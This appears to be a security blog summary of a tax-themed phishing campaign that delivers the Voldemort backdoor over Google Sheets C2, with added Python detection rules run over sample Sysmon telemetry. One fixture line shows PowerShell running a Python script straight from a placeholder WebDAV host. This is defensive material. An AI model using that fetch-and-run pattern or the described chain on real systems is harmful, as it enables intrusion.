Malware campaign using Google Sheets as a command-and-control mechanism

CISSP

Cybersecurity researchers discovered a novel malware campaign using Google Sheets as a command-and-control (C2) mechanism. Detected by Proofpoint starting August 5, 2024, the campaign impersonates tax authorities from various countries to target over 70 organizations globally using a custom tool called Voldemort. The campaign has not been attributed to a specific threat actor, but it resembles both cyber espionage and cybercrime activities.

Targeted Sectors:

  • A wide range of sectors including insurance, aerospace, transportation, academia, finance, technology, industrial, healthcare, automotive, hospitality, energy, government, media, manufacturing, telecom, and social benefit organizations.

Attack Methodology:

  • The campaign sends phishing emails claiming to be from tax authorities in several countries (U.S., U.K., France, Germany, Italy, India, Japan).
  • Emails direct recipients to Google AMP Cache URLs, which lead to an intermediate page that checks if the operating system is Windows.
  • If Windows is detected, it uses the search-ms: URI protocol to display a malicious Windows shortcut (LNK) file disguised as a PDF.
  • Executing the LNK file triggers PowerShell to run a Python script from a WebDAV share without downloading any files locally, with dependencies loaded directly from the WebDAV share.

Malware Capabilities:

  • The Python script collects system information and sends it as a Base64-encoded string to an actor-controlled domain.
  • It also shows a decoy PDF to the user and downloads a password-protected ZIP file from OpenDrive containing:
    • A legitimate executable (“CiscoCollabHost.exe”) vulnerable to DLL side-loading.
    • A malicious DLL (“CiscoSparkLauncher.dll”), named Voldemort, which is a custom backdoor written in C.
  • Voldemort uses Google Sheets for C2 communication, data exfiltration, and executing commands.

Techniques and Tools:

  • The campaign abuses file scheme URIs (“file://”) to access external resources for malware staging via WebDAV and SMB.
  • These tactics are common among initial access brokers (IABs) like Latrodectus, DarkGate, and XWorm.
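
The detection side of the chain described in the Attack Methodology, Malware Capabilities and Techniques sections above, as an added example that is not part of the original post or of Proofpoint's research: four rules run over constructed Sysmon-style process-creation, image-load and network events. Field names follow Sysmon; the hostnames, paths and record ids are invented, and the assumption that the backdoor reaches Google Sheets through the sheets.googleapis.com API host is mine.

```python
"""Detection rules for the Voldemort-style delivery chain, run over
constructed Sysmon-style telemetry.  Added example, not the post's or
Proofpoint's code.  EventID 1 = process creation, 3 = network connection,
7 = image load."""
import re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Assumption: the implant talks to the Sheets REST API host; docs.google.com
# is included as the web front end.
SHEETS_HOSTS = ("sheets.googleapis.com", "docs.google.com")
# UNC path as the Windows WebDAV mini-redirector writes it:
# \\host\share, \\host@SSL\DavWWWRoot\..., \\host@8080\...
UNC_PATH = re.compile(r"\\\\[\w.-]+(?:@SSL)?(?:@\d+)?\\", re.IGNORECASE)
TRUSTED_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")


def basename(path):
    """Lower-cased final path component, tolerant of forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_search_ms_remote(ev):
    """explorer.exe handling a search-ms: URI whose location is a remote share."""
    if ev.get("EventID") != 1 or basename(ev.get("Image", "")) != "explorer.exe":
        return False
    cmd = ev.get("CommandLine", "")
    return "search-ms:" in cmd.lower() and UNC_PATH.search(cmd) is not None


def rule_shortcut_to_remote_script(ev):
    """PowerShell spawned by explorer.exe (what a double-clicked LNK looks like)
    that runs a Python script straight off a UNC share: nothing is dropped locally."""
    if ev.get("EventID") != 1 or basename(ev.get("Image", "")) not in SHELLS:
        return False
    if basename(ev.get("ParentImage", "")) != "explorer.exe":
        return False
    cmd = ev.get("CommandLine", "").lower()
    return UNC_PATH.search(cmd) is not None and (".py" in cmd or "python" in cmd)


def rule_sideload_from_user_dir(ev):
    """An unsigned DLL loaded from outside the trusted install directories.
    CiscoCollabHost.exe loading CiscoSparkLauncher.dll from a ZIP extracted
    into the user profile is one instance of this general pattern."""
    if ev.get("EventID") != 7:
        return False
    loaded = ev.get("ImageLoaded", "").lower()
    if not loaded.endswith(".dll") or ev.get("Signed", "").lower() == "true":
        return False
    return not loaded.startswith(TRUSTED_DIRS)


def rule_sheets_from_non_browser(ev):
    """Connection to a Google Sheets host from a process that is not a browser;
    a backdoor using Sheets as its C2 channel shows up exactly like this."""
    if ev.get("EventID") != 3 or basename(ev.get("Image", "")) in BROWSERS:
        return False
    host = ev.get("DestinationHostname", "").lower()
    return any(host == h or host.endswith("." + h) for h in SHEETS_HOSTS)


RULES = {
    "search_ms_remote": rule_search_ms_remote,
    "shortcut_to_remote_script": rule_shortcut_to_remote_script,
    "sideload_from_user_dir": rule_sideload_from_user_dir,
    "sheets_from_non_browser": rule_sheets_from_non_browser,
}


def run_detections(events):
    """Return (rule_name, RecordID) for every event/rule pair that fires."""
    return [(name, ev["RecordID"]) for ev in events
            for name, rule in RULES.items() if rule(ev)]


# Constructed sample telemetry; hosts, paths and record ids are invented.
SAMPLE_EVENTS = [
    {"RecordID": 1, "EventID": 1, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Windows\explorer.exe" search-ms:displayname=Downloads&crumb=location:\\webdav.example.invalid@SSL\DavWWWRoot\docs'},
    {"RecordID": 2, "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe \\webdav.example.invalid@SSL\DavWWWRoot\python\python.exe \\webdav.example.invalid@SSL\DavWWWRoot\stage.py'},
    {"RecordID": 3, "EventID": 7, "Image": r"C:\Users\alice\AppData\Local\Temp\CiscoCollabHost.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\CiscoSparkLauncher.dll", "Signed": "false"},
    {"RecordID": 4, "EventID": 3, "Image": r"C:\Users\alice\AppData\Local\Temp\CiscoCollabHost.exe",
     "DestinationHostname": "sheets.googleapis.com"},
    # Benign noise that must not fire.
    {"RecordID": 5, "EventID": 3, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationHostname": "docs.google.com"},
    {"RecordID": 6, "EventID": 7, "Image": r"C:\Program Files\Cisco\CiscoCollabHost.exe",
     "ImageLoaded": r"C:\Program Files\Cisco\CiscoSparkLauncher.dll", "Signed": "true"},
    {"RecordID": 7, "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\Users\alice\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for hit in run_detections(SAMPLE_EVENTS):
        print(hit)
```

Each rule keys on a behaviour rather than on the campaign's file names, so the same logic still fires when the lure domain, share name or side-loaded pair changes; the Cisco pair from the post is only the sample that exercises the side-loading rule. In a real deployment the Sheets rule is the noisiest of the four (updaters and office add-ins also reach Google APIs), so it is best tuned with an allow-list of known signed images before it pages anyone.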

Findings and Observations:

  • Proofpoint identified six victims using Google Sheets, one of which may be a sandbox or a researcher.
  • The campaign appears to have cast a wide net before focusing on a smaller set of targets.
  • The campaign combines sophisticated techniques with basic methods, making it difficult to assess the threat actor’s technical capabilities and final objectives.

Context and Implications:

  • The campaign reflects a “Frankensteinian” mix of advanced and rudimentary tactics, complicating attribution and threat assessment.
  • It suggests potential espionage motives behind the campaign, although the final objectives remain unknown.
  • Netskope Threat Labs recently reported an updated version of the Latrodectus malware, highlighting ongoing evolution and feature enhancements, which include new backdoor commands for downloading shellcode and retrieving files.